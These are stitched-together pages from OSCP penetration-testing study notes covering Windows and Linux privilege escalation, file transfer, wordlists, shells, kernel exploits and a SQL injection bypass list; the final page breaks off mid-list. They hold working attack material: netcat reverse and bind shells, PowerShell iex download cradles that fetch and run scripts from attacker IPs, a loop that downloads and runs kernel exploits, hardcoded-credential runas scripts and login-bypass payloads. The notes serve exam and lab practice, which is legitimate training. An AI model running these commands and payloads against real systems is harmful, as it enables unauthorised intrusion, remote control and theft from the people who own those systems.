![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-Mkm6i93p1UT2eCHmF8o%252F-Mkm7Z6vvtuZbBs_diA_%252Fimage.png%3Falt%3Dmedia%26token%3Df92bea50-d9bd-4c85-9dd8-1294eb4e6956&width=768&dpr=4&quality=100&sign=e858e499&sv=2) ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-Mkm6i93p1UT2eCHmF8o%252F-Mkm7d5ODsXTbXunvopc%252Fimage.png%3Falt%3Dmedia%26token%3D3b374fe4-8da6-4283-bc46-9561e391f4d1&width=768&dpr=4&quality=100&sign=2cd20582&sv=2) _So let’s switch user to b33f and escalate privileges._ [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/sudo-su#runas) Runas ------------------------------------------------------------------------------------------- * We can use runas command to switch user, however sometimes with low privileged user shell, it will not prompt for password input. * Runas is a very useful command on Windows OS. This command enables one to run a command in the context of another user account. Copy runas /user:username program _If above command ask password, well and good.We can enter the password and get privilege escalated, else if it does not ask for password input then we will have to try our_ _**powershell script.**_ [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/sudo-su#powershell) Powershell ----------------------------------------------------------------------------------------------------- * Create below 2 files and transfer them to low privileged shell along with nc.exe **ps-sudo.ps1** Copy $pw= convertto-securestring "b33fpassword" -asplaintext -force $pp= new-object System.Management.Automation.PSCredential -argumentlist "b33f",$pw $script= 'C:\Windows\Temp\nc.bat' Start-Process powershell -Credential $pp -ArgumentList "-noprofile -command &{Start-Process C:\Window\Temp\nc.bat -verb Runas}" **nc . bat** Copy C:\Window\Temp\nc.exe 10.11.1.40 443 -e cmd.exe ### [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/sudo-su#executing-script) Executing script Copy powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1') [PreviousDumping the sam file](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/dumping-the-sam-file) [NextAutomated enumeration script](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/automated-enumeration-script) Last updated 4 years ago --- # Linux | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/linux#wget) Wget --------------------------------------------------------------------------- Copy wget http://192.168.1.5/linpeas.sh -o linpeas.sh [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/linux#curl) cURL --------------------------------------------------------------------------- Copy curl http://192.168.1.5/hello.txt -o hello.txt [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/linux#netcat) Netcat ------------------------------------------------------------------------------- **Sender** Copy nc -lvp 1234 < test.txt **Receiver** Copy nc -nv 127.0.0.1 1234 > test.txt [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/linux#scp) SCP ------------------------------------------------------------------------- * Copies files between two hosts over SSH **Copy local file to remote system** \- Copy scp file.txt remote_username@10.10.10.10:/remote/directory **Copy remote file to local system -** Copy scp remote_username@10.10.10.10:/remote/file.txt /local/directory **I**mprove scp performance by **using blowfish** Copy scp -c blowfish remote_username@10.10.10.10:/remote/directory [PreviousGeneral](https://gabb4r.gitbook.io/oscp-notes/file-transfer/general) [NextWindows](https://gabb4r.gitbook.io/oscp-notes/file-transfer/windows) Last updated 4 years ago --- # Custom Worldlist | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/custom-worldlist#crunch) Crunch --------------------------------------------------------------------------------------------- #### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/custom-worldlist#all-possible-combination-of-4-word-capital-letters-in-alphabet) **All possible combination of 4 word capital letters in alphabet** Copy crunch 4 4 ABCDEFGHIJKLMNOPQRSTUVWXYZ -o /root/Desktop/wordlist.txt **All possible combination of 5 digits, in numbers** Copy crunch 5 5 0123456789 -o /root/Desktop/numbers.txt **Creating wordlist containing year ( For example birthdate of target )** Copy crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ -t @@@@1980 -o /root/Desktop/wordlist.txt # This will add 1980 at last in every word , **\-p flag to prevent repeating word to be generated** Using the -p option in Crunch prevents characters or words from being repeated. This is especially useful when generating a wordlist with different combinations of given words. Let’s have a look at how this works if we specify the words ‘Virtual Hacking Labs’: Copy crunch 1 2 -p Virtual Hacking Labs Copy @ Lower case alpha characters , Upper case alpha characters % Numeric characters ^ Special characters including spac crunch 6 8 -t ,@@^^%% [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/custom-worldlist#cewl) cewl ----------------------------------------------------------------------------------------- Cewl is a great tool that **spiders through (i.e. indexes) all the webpages of a website based on the parameters you set and then outputs a list of all words it finds there.** Important parameters - * \-m is the minimum word length for words to save to the wordlist. * \-d is the maximum depth the spider is allowed to scrape. * \-o is offsite, used to allow the spider to leave the current website to another website. * \-w writes to output file, specify the output file here. **The -m, -d and -o parameters can impact enormously on the time the tool takes to produce the wordlist.** For this reason, it is best **not to set the value for -d (scanning depth) too high** - especially when used in conjunction with -o which allows the spider to visit other sites. Copy cewl -d 1 -m 8 -w /root/Desktop/cewl.txt https://www.kali.org Add minimum password length: Copy cewl -w createWordlist.txt -m 6 https://www.example.com Tip: Is Cewl not working as expected? Keep in mind that tools like this generate a large number of requests for a given website which may trigger web application firewalls (WAF). When Cewl doesn't output any results, you can use the -v flag for verbose output which maybe give you a clue about the problem (such as WAF blocking requests). [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/custom-worldlist#html2dic) Html2dic ------------------------------------------------------------------------------------------------- Copy curl http://example.com > example.txt html2dic example.txt [PreviousCracking Password](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password) [NextSearchsploit](https://gabb4r.gitbook.io/oscp-notes/exploitaion/searchsploit) Last updated 4 years ago --- # Automated enumeration script | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/automated-enumeration-script#powerup) PowerUp -------------------------------------------------------------------------------------------------------------------- Copy wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 To run PowerUp, start a PowerShell session and **use dot sourcing to load the script:** Copy CMD> powershell -exec bypass PS> . .\PowerUp.ps1 PS> Invoke-AllChecks # Run the Invoke-AllChecks function to start checking for common privilege escalation misconfigurations. **OR** Copy C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks" [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/automated-enumeration-script#sharpup-if-powershell-is-not-available) **SharpUp: (If Powershell is not available)** ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- PowerUp & SharpUp are very similar tools that hunt for specific privilege escalation misconfigurations. Copy # Code: https://github.com/GhostPack/SharpUp # Pre-Copiled: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe To run SharpUp, start a command prompt and run the executable: Copy .\SharpUp.exe [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/automated-enumeration-script#seatbelt) Seatbelt ---------------------------------------------------------------------------------------------------------------------- Seatbelt is an enumeration tool. It contains a number of enumeration checks. It does not actively hunt for privilege escalation misconfigurations, but provides related information for further investigation. Copy # Code: https://github.com/GhostPack/Seatbelt # Pre-Compiled: https://github.com/r3motecontrol/Ghostpa-CompiledBinaries/blob/master/Seatbelt.exe To run **all checks** and filter out unimportant results: Copy .\Seatbelt.exe all To run **specific check(s):** Copy .\Seatbelt.exe [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/automated-enumeration-script#winpeas) winPEAS -------------------------------------------------------------------------------------------------------------------- winPEAS is a very powerful tool that not only actively hunts for privilege escalation misconfigurations, but highlights them for the user in the results. Copy # Code: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS Before running, we need to add a registry key and then reopen the command prompt: Copy reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1 Run all checks while avoiding time-consuming searches: Copy .\winPEASany.exe quiet cmd fast Run specific check categories: Copy .\winPEASany.exe quiet cmd systeminfo [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/automated-enumeration-script#accesschk.exe) accesschk.exe -------------------------------------------------------------------------------------------------------------------------------- AccessChk is an old but still trustworthy tool **for checking user access control rights.** You can use it to check whether a user or group has access to files, directories, services, and registry keys. The downside is more recent versions of the program spawn a GUI “accept EULA” popup window. When using the command line, we have to use an older version which still has an **/accepteula** command line option. Copy https://xor.cat/assets/other/Accesschk.zip **Always do this first** Copy accesschk.exe /accepteula (always do this first!!!!!) **Find all weak file permission per drive.** Copy accesschk.exe -uwqs Users c:\*.* accesschk.exe -uwqs "Authenticated Users" c:\*.* **Find all weak folder permission per drive** Copy accesschk.exe -uwdqs Users c:\ accesschk.exe -uwdqs "Authenticated Users" c:\ [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/automated-enumeration-script#privesccheck) PrivescCheck ------------------------------------------------------------------------------------------------------------------------------ This script aims to **enumerate common Windows configuration issues** that can be leveraged for local privilege escalation. It also **gathers various information** that might be useful for **exploitation** and/or **post-exploitation**. Copy C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" # From cmd PS C:\Temp\> Set-ExecutionPolicy Bypass -Scope process -Force PS C:\Temp\> . .\PrivescCheck.ps1; Invoke-PrivescCheck # From powershell C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended" # By default, the scope is limited to vulnerability discovery but, you can get a lot more information with the -Extended option [PreviousSUDO SU](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/sudo-su) [NextWindows Exploit Suggester](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/windows-exploit-suggester) Last updated 4 years ago --- # CheckList | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/checklist#general) General ---------------------------------------------------------------------------------- * Always I say always check default credentials for every single service you came across or which has authentication or also don't forget to try common credentials like admin:admin (Will save your lot of time trust me) * Gained foothold through web based vulnerability ? DON'T forget to check web root directory where that web site is running , you will likely get configs and juicy information that will help you to privesc * Found password , but still not working ? make sure if it's not encoded or hashed * Providing payload through url or in post data , DON'T forget to try with both url encoding and without encoding , here is site i use to encode urls along with payload data [https://meyerweb.com/eric/tools/dencoder/](https://meyerweb.com/eric/tools/dencoder/) as burpsuite not working for me :( * This is must - Don't overthink , use what is in front of you , it's intended and vulnerable * ALWAYS check all ports , don't fall for rabit hole , run full nmap scan on all ports , no matter how high port that is, you will never know what service actually running without trying different scans * Always first search for exploit with searchsploit * Always try admin:admin , root:root, root:toor on target box , it will lead somewhere sometime * Learn how to trigger error messages in web apps, because once you know what's is running in background , you can search for that particular thing on google and github and you will get source code for that and will open new paths for you and also help you to narrow down your attack vector * If nothing work, remember devil is in the information , get all information and look and think * change browsers if you think things are not working as expected , this is funny but yeah sometime my brave browser doesn't allow some sites script to properly load and i have to do it on mozila so make sure you are not missing anything * You run exploit and you are sure that it's exact exploit and version that can execute your shell but still not getting connection back , probably because of target firewall rules , try to change listening port to something like 21,22,80,443 or 1. For reverse shells, I use ports that are already shown to be open on the victim machine. That always seems to work for me. 2. Use a port that your nmap enumeration said was already open on the victim machine. * If you are using right exploit and still it's not working try to change the payload to something like staged to non-staged also architecture and ett [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/checklist#linux) Linux ------------------------------------------------------------------------------ * Gain credentials on box , try sudo su to check if user re-used that password [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/checklist#window) Window -------------------------------------------------------------------------------- * You are likely to find your uploaded files in the directory where your reverse or bind shell is executed and not in directory where you actually uploaded, quit weird but yeah don't forget to check the folder where your shell is executed * Always check "Program Files" and "Program Files(x86)" while doing privesc , you will likely find installed softwares and applications on box that if vulnerable will lead you to admin , [PreviousSQL Injection Bypass](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/sql-injection-bypass) [NextXSS Payload](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/xss-payload) Last updated 4 years ago --- # Find Command Cheatsheet | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/find-command-cheatsheet#find-things-by-name) Find things by name ------------------------------------------------------------------------------------------------------------------------ Copy find /path/to/search -name filename [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/find-command-cheatsheet#find-things-by-name-case-insensitive) Find things by name (case-insensitive) ------------------------------------------------------------------------------------------------------------------------------------------------------------ Copy find /path/to/search -iname filename [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/find-command-cheatsheet#find-only-files-by-name) Find only files by name -------------------------------------------------------------------------------------------------------------------------------- Copy find /path/to/search -name filename -type f must notice that " " quotes, you must use it if you want to use wildcards otherwise it will not find , and also **f** in type stand for file [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/find-command-cheatsheet#find-only-directories-by-name) Find only directories by name -------------------------------------------------------------------------------------------------------------------------------------------- Copy find /path/to/search -name dirname -type d [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/find-command-cheatsheet#find-file-with-insecure-permission) Find file with insecure permission ------------------------------------------------------------------------------------------------------------------------------------------------------ Copy find / -writable -type d 2>/dev/null [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/find-command-cheatsheet#find-all-symlinks) Find all symlinks -------------------------------------------------------------------------------------------------------------------- Copy find /path/to/search -type l [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/find-command-cheatsheet#find-things-by-its-owner) Find things by it's owner ----------------------------------------------------------------------------------------------------------------------------------- Copy find /path/to/search -user owner [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/find-command-cheatsheet#find-executable-files) Find executable files ---------------------------------------------------------------------------------------------------------------------------- Copy find /path/to/search -type f -executable [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/find-command-cheatsheet#find-suid-files) Find SUID files ---------------------------------------------------------------------------------------------------------------- Copy find /path/to/search -perm -4000 [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/find-command-cheatsheet#find-things-changed-in-the-last-24-hours) Find things changed in the last 24 hours ------------------------------------------------------------------------------------------------------------------------------------------------------------------ Copy find /path/to/search -ctime -1 [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/find-command-cheatsheet#find-files-bigger-than-x-size) Find files bigger than X Size -------------------------------------------------------------------------------------------------------------------------------------------- Copy find /path/to/search -size + $ find ~ -size +5000M [PreviousCommand injection Cheatsheet](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/command-injection-cheatsheet) [NextNetcat](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/netcat) Last updated 4 years ago --- # Bind and Reverse shell | OSCP Notes * Reverse shells can be initiated using many different programming and scripting languages including PHP, ASP, Python, Perl and PowerShell. If you have managed to get code execution on a compromised host or you can inject code, upload or include files in a web application, this can often be turned into a command-line shell with just a little work no matter what the platform or application language. For receiving the shell on the attack box, we can use several different tools such as Netcat, Metasploit and Empire * **A bind shell is, as the reverse shell, also set up on the target host, but instead of connecting back to a listening host, it binds to a specific port and waits for incoming connections.** In malicious software terms a bind shell is what is referred to as a ‘backdoor’. [](https://gabb4r.gitbook.io/oscp-notes/shell/bind-and-reverse-shell#reverse-shell) Reverse shell ------------------------------------------------------------------------------------------------------ ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-Mkk7P06COo4Wwg8rVwG%252F-Mkk8VPRjYQw9ykUwTPK%252Fimage.png%3Falt%3Dmedia%26token%3D182b2561-d827-4392-aff8-0b11cda258f4&width=768&dpr=4&quality=100&sign=e26a5b1f&sv=2) One advantage of reverse shells is that they have the highest success rate if there are firewalls and NAT devices between the attacker and the victim. For instance, when the target host connects to the internet through a NAT device an attacker won’t be able to connect to the target host directly without first configuring the target’s networking equipment. In this situation, bind shells won’t work, but can be possible to establish a connection using a reverse shell. Another advantage of reverse shells is that outgoing connections are normally not as heavily filtered by a firewall as incoming connections. Even so, you should keep in mind that egress rules may apply and suspicious connections (such as connections on port 4444) may still get flagged and blocked preventing the reverse shell from reaching you. If you can disguise your traffic to look like legitimate traffic, your chances of success increase and your reverse shell is less likely to be blocked. ### [](https://gabb4r.gitbook.io/oscp-notes/shell/bind-and-reverse-shell#attacker) Attacker Copy nc -lvp 4444 # listen for incoming connections ### [](https://gabb4r.gitbook.io/oscp-notes/shell/bind-and-reverse-shell#target) Target Copy nc 4444 -e /bin/bash # Linux target nc 4444 -e cmd.exe # Window target [](https://gabb4r.gitbook.io/oscp-notes/shell/bind-and-reverse-shell#bind-shell) Bind shell ------------------------------------------------------------------------------------------------ As explained earlier in this chapter a **bind shell is a shell that binds to a specific port on the target host to listen for incoming connections.** In this case the attack box connects to the target host on a specific port (rather than the target sending the shell back to the attack box as in a reverse shell). ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-Mkk7P06COo4Wwg8rVwG%252F-Mkk90SaJs1DIKEsS8OM%252Fimage.png%3Falt%3Dmedia%26token%3Da52dd5d1-2c51-4025-9e7f-6ec6437a5ebb&width=768&dpr=4&quality=100&sign=b3c606a4&sv=2) ### [](https://gabb4r.gitbook.io/oscp-notes/shell/bind-and-reverse-shell#target-1) Target Copy nc -lvp 4444 -e /bin/bash ### [](https://gabb4r.gitbook.io/oscp-notes/shell/bind-and-reverse-shell#attacker-1) Attacker Copy nc 4444 IMP: When working with bind shells it is important to realize their limitations. First of all, the attacker must have a route to the target. If the target is behind a NAT device, the bind shell will open a port on the local network that is inaccessible to the attacker. Another important factor is that bind shells can only bind to an open and unused port. Thus, if there’s a web server running on port 80 and 443 and you are trying to bind a shell to one of these ports to make your traffic look legitimate, you will fail. Lastly it is very common for unusual ports to be blocked by firewalls. Most firewalls are configured to allow access only for specific traffic to known services. If a firewall blocks traffic to your port set in your bind shell you may be able to open up the port on the target host, but you won’t be able to connect to it. In this sort of scenario, a reverse shell has more chance of success. [PreviousCompiling the Exploit](https://gabb4r.gitbook.io/oscp-notes/exploitaion/compiling-the-exploit) [NextUpgrading shell](https://gabb4r.gitbook.io/oscp-notes/shell/upgrading-shell) Last updated 4 years ago --- # Kernel Exploitation | OSCP Notes * Kernels are the core of any operating system. * Think of it as a layer between application software and the actual computer hardware. * The kernel has complete control over the operating system. Exploiting a kernel vulnerability can result in execution as the root user. [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/kernel-exploitation#finding-kernel-exploit) Finding kernel exploit --------------------------------------------------------------------------------------------------------------------------------------- 1. **Enumerate kernel version -** `**uname -a**` 2. **Find matching exploits ( Google, ExploitDB, Github)** 3. **Compile and run.** note: Beware though, as Kernel exploits can often be unstable and may be one-shot or cause a system crash. ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/kernel-exploitation#linux-local-exploit) Linux Local Exploit Copy linux-exploit-suggester unix_privesc_check kernel 2.4.x / 2.6.x (sock_sendpage 1) kernel 2.4 / 2.6 (sock_sendpage 2) kernel < 2.6.22 (ftruncate) kernel < 2.6.34 (cap_sys_admin) kernel 2.6.27 < 2.6.36 (compat) kernel < 2.6.36-rc1 (can bcm) kernel <= 2.6.36-rc8 (rds protocol) kernel < 2.6.36.2 (half nelson) kernel <= 2.6.37 (full nelson) kernel 2.6 (udev) kernel 3.13 (sgid) kernel 3.13.0 < 3.19 (overlayfs 1) kernel 3.14.5 (libfutex) kernel 2.6.39 <= 3.2.2 (mempodipper) kernel 2.6.28 / 3.0 (alpha-omega) kernel 2.6.22 < 3.9 (Dirty Cow) kernel 3.7.6 (msr) kernel < 3.8.9 (perf_swevent_init) kernel <= 4.3.3 (overlayfs 2) kernel 4.3.3 (overlayfs 3) kernel 4.4.0 (af_packet) kernel 4.4.x (double-fdput) kernel 4.4.0-21 (netfilter) kernel 4.4.1 (refcount) ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/kernel-exploitation#other-exploits) Other exploits * Linux Kernel 2.6.39 - 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation: * [https://www.exploit-db.com/exploits/18411/](https://www.exploit-db.com/exploits/18411/) * [https://www.securityfocus.com/bid/51625/info](https://www.securityfocus.com/bid/51625/info) * CVE-2012-0056 * Linux Kernel 2.6.22 - 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method): * [https://www.exploit-db.com/exploits/40616/](https://www.exploit-db.com/exploits/40616/) * CVE-2016-5195 * Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation * [https://www.exploit-db.com/exploits/3/](https://www.exploit-db.com/exploits/3/) * [http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c](http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c) * CVE-2003-0127 * Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV below 1.4.1 - Local Privilege Escalation (1) * [https://www.exploit-db.com/exploits/8478/](https://www.exploit-db.com/exploits/8478/) * exploit/linux/local/udev\_netlink ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/kernel-exploitation#exploits-worth-running) Exploits worth running * Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation Copy https://www.exploit-db.com/exploits/37292 * CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8 Copy https://www.exploit-db.com/exploits/15285/ * Linux Kernel <= 2.6.37 'Full-Nelson.c' Copy https://www.exploit-db.com/exploits/15704/ * CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) Copy https://git.zx2c4.com/CVE-2012-0056/about/ * Linux CVE 2012-0056 Copy wget -O exploit.c gcc -o mempodipper exploit.c ./mempodipper * CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 Copy https://dirtycow.ninja/ * Compile dirty cow: Copy g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil * Cross compiling exploits Copy gcc -m32 -o output32 hello.c #(32 bit) gcc -m64 -o output hello.c # (64 bit) * Linux 2.6.32 Copy https://www.exploit-db.com/exploits/15285/ * Elevation in 2.6.x: Copy for a in 9352 9513 33321 15774 15150 15944 9543 33322 9545 25288 40838 40616 40611 ; do wget http://yourIP:8000/$a; chmod +x $a; ./$a; id; done [PreviousLinux post exploitation scripts](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts) [NextGeneral](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/general) Last updated 4 years ago --- # Windows | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/windows#certutils) Certutils --------------------------------------------------------------------------------------- Copy certutil.exe -urlcache -split -f http://10.0.0.5/40564.exe bad.exe [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/windows#iwr-invoke-web-request) IWR (Invoke Web Request) ------------------------------------------------------------------------------------------------------------------- Copy powershell.exe Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1 powershell.exe -command iwr -Uri http://192.168.1.2/putty.exe -OutFile C:\Temp\putty.exe " [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/windows#system.net.webclient) System.Net.WebClient ------------------------------------------------------------------------------------------------------------- Copy powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/putty.exe', 'putty.exe') [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/windows#iex) IEX --------------------------------------------------------------------------- Instead of downloading to disk, the payload can instead be executed in memory, using Invoke-Expression, or the alias **iex**. Copy powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1') IEX also accepts pipeline input. Copy powershell Invoke-WebRequest http://10.10.16.26/rev.ps1 | iex ### [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/windows#internet-explorer-basic-parsing) Internet Explorer Basic Parsing There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download. ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-MkmAxYIbmdFs9oaj2g0%252F-MkmBhCC0EPVx8HqY2gU%252Fimage.png%3Falt%3Dmedia%26token%3Dd2ba7b16-ccb3-4c9e-98f3-6c6a94be99cc&width=768&dpr=4&quality=100&sign=cc9ce98e&sv=2) This can be bypassed using the parameter `-UseBasicParsing`. Copy powershell Invoke-WebRequest https:///PowerView.ps1 -UseBasicParsing | iex ### [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/windows#escaping-shell) Escaping shell If you ever encounter error regarding slash while supplying any of above command **Incorrect syntax near '/'.** Use `/` to escape it - Copy powershell.exe IEX (New-ObjectNet.WebClient).DownloadString(\"http://10.10.16.26:8000/rev.ps1\") [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/windows#script) Script --------------------------------------------------------------------------------- * if above command get **blocked** we can make **ps script** that will download our file * run following commands in victim : Copy echo $storageDir = $pwd > wget.ps1 echo $webclient = New-Object System.Net.WebClient >> wget.ps1 echo $url = "[http://ATTACKER_IP/nc.exe"](http://ATTACKER_IP/nc.exe) >> wget.ps1 echo $file = "nc.exe" >> wget.ps1 echo $webclient.DownloadFile($url,$file) >> wget.ps1 Execution of script Copy powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/windows#smb) SMB --------------------------------------------------------------------------- **Attacker** - Copy smbserver.py gabbar /tmp **Target -** Copy dir \\Attacker_ip\gabbar # will list out all files copy \\10.10.14.109\gabbar\winPEASx86.exe . # To download from our machine copy user.txt \\10.10.14.109\gabbar # To upload file to our box [PreviousLinux](https://gabb4r.gitbook.io/oscp-notes/file-transfer/linux) [NextCommand injection Cheatsheet](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/command-injection-cheatsheet) Last updated 4 years ago --- # SQL Injection Bypass | OSCP Notes Copy tom' or 1=1 LIMIT 1;# or 1=1 or 1=1-- or 1=1# or 1=1/ admin' -- admin' # admin'/ admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/ admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/ admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/ admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/ 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/ admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/ admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/ admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/ admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 [PreviousNetcat](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/netcat) [NextCheckList](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/checklist) Last updated 4 years ago --- # General | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/general#window-privesc-in-brief) Window privesc in brief ------------------------------------------------------------------------------------------------------------------------------- 1. Stored Credentials 2. Windows Kernel Exploit 3. DLL Injection 4. Unattended Answer File 5. Insecure File/Folder Permissions 6. Insecure Service Permissions 7. DLL Hijacking 8. Group Policy Preferences 9. Unquoted Service Path 10. Always Install Elevated 11. Token Manipulation 12. Insecure Registry Permissions 13. Autologon User Credential 14. User Account Control (UAC) Bypass 15. Insecure Named Pipes Permissions 16. Scheduled task [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/general#common-technique) Common technique ----------------------------------------------------------------------------------------------------------------- * Videos - [YouTube](https://www.youtube.com/playlist?list=PLjG9EfEtwbvIrGFTx4XctK8IxkUJkAEqP) * [WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/) * [WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/) * [WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/) * [WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/) * [WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/) * [WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/) * [WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/) * [WPE-08 - Unquoted Service 